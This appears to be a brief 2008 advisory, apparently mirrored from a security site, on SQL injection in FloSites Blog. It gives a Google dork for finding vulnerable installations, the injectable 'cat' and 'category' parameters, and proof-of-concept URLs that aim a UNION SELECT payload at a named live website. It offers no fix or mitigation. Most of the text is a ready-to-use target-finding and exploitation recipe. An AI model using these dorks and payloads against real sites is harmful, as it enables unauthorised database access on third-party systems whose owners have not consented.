FloSites Blog Multiple Remote SQL-vulnerability warning-the black bar safety net

2008-11-18T00:00:00
ID MYHACK58:62200821127
Type myhack58
Reporter 佚名
Modified 2008-11-18T00:00:00

Description

[+] Google Dork

"blog by flosites"

[+] Exploit

http://[site]/[path]/index. php? cat=-1 [SQL]/ http://[site]/[path]/index. php? category=-1 [SQL]/

[+] Proof of Concept

http://www.designaglow.com/blog/index.php?cat=-1+union+select+1,version(),3/ http://www.designaglow.com/blog/index.php?category=-1+union+select+1,version(),3/